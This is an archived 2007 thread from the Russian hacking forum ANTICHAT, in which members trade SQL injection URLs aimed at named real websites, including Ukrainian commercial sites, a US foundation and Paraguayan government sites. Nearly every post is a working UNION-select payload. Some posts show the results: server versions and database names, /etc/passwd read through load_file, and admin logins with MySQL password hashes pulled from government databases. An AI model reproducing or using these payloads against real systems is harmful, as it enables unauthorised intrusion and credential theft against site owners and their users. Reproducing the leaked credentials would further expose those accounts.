ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.09.2007, 22:28
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
http://poderedomex.com/notas.asp?nota_id=1+or+1=(SELECT+TOP+1+nota_id+FRO M+a_nota)--
источник)
http://www.securitylab.ru/vulnerability/303771.php
http://www.hiltonfoundation.org/main.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('report','category_tbl','ceremony','comd_list','c onference','cyfd','DIY_TEMPCOMMAND_TABLE','dtprope rties','extension_tbl','filetype_tbl','font_tbl',' gaga_Commander_Tmp','GY_TmpTable','hyperlink_tbl', 'image_tbl','lulu','media_category_tbl'')--
Последний раз редактировалось kair; 28.09.2007 в 23:09..
|
|
|
28.09.2007, 22:44
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
www.vega-tur.ru
http://www.vega-tur.ru/index.php?num=2-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/*
vega_admin@localhost:4.1.22-standard:vega_news
|
|
|
|
28.09.2007, 23:03
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Код:
http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,load_file('/home'),19,20,21,22,23,24/*
Код:
http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,load_file('/etc/passwd'),19,20,21,22,23,24/*
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
фряха, читаем содержимое директорий, файлов |
|
|
|
29.09.2007, 00:46
|
|
Новичок
Регистрация: 26.09.2007
Сообщений: 14
Провел на форуме:
124489
Репутация:
-38
|
|
Вот парочка скл иньекций:
Код HTML:
http://www.motory.com.ua/news.phtml?id=-1+union+select+1,2,login,password+from+admin/*
Код HTML:
http://www.tours.com.ua/base.phtml?id=-1+union+select%201,2,3,4,5,6,7,8,9,10+from+base/*
|
|
|
|
29.09.2007, 00:55
|
|
Новичок
Регистрация: 26.09.2007
Сообщений: 14
Провел на форуме:
124489
Репутация:
-38
|
|
Сори не выложил сразу вот еще одна 
Код HTML:
http://www.ji-association.org/news.phtml?id=-1+union+select+111,222,333,444,555,666,777,888,999,10+from+users/*
|
|
|
|
29.09.2007, 06:34
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
код:
http://www.ovacia.com.ua/event.php?id=-16'+union+select+1,2,3,4,5,6,7,8,9,10+from+admin/*
|
|
|
|
29.09.2007, 09:01
|
|
Новичок
Регистрация: 26.09.2007
Сообщений: 14
Провел на форуме:
124489
Репутация:
-38
|
|
Код HTML:
http://www.pharm-system.com/?page=archive&rubid=-1+union+select+777+from+users/*
Код HTML:
http://www.lodka.com.ua/news.phtml?id=222+union+select+1,2,3,4+from+news/*
|
|
|
|
29.09.2007, 11:06
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
что-то последнее время все "пошли" на рідну неньку - Украину 
пароль в открытом виде /админка http://www.pokupai.mobi/admin/ /
http://www.pokupai.mobi/index.php?act=sub_cat&id_sub=16699'+uNioN+sElEct+1 ,2,3,concat(login,':',pass),5,6+from+admin/*
Сайт крупный со своей почтой, форумом, и тд /пс. этот сайт уже фигурировал в антибояне, но в другом скрипте http://wap.mobilnik.ua...../
http://mobilnik.ua/catalog/compare.php?id1=4021&id2=19956+unIOn+sELect+1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,concat(username,0x3a,password,0x3a,salt,0x3a ,email,0x3a,usertitle),3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+f rom+mobilnik_forum.forum_user+where+usertitle=0xc0 e4ece8ede8f1f2f0e0f2eef0+limit+0,1/*
|
|
|
|
29.09.2007, 16:42
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
gov.py
Код:
http://www.snna.gov.py/noticia.php?id=9999999/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4/*
snna@localhost:4.1.20:snna
Код:
http://www.programaumbral.gov.py/eventos_ver.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9/*
pupusaid_admin@localhost:4.0.25-standard:pupusaid_umbral
Код:
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12/*
4.1.12 usr_seam@localhost seam
Код:
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+2,2/*
fflores:773359240eb9a1d9
Код:
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+3,3/*
adm_seam:0504cab7628f6128
итд =\\\ |
|
|
|
29.09.2007, 19:04
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится
код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/* |
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Линейный вид
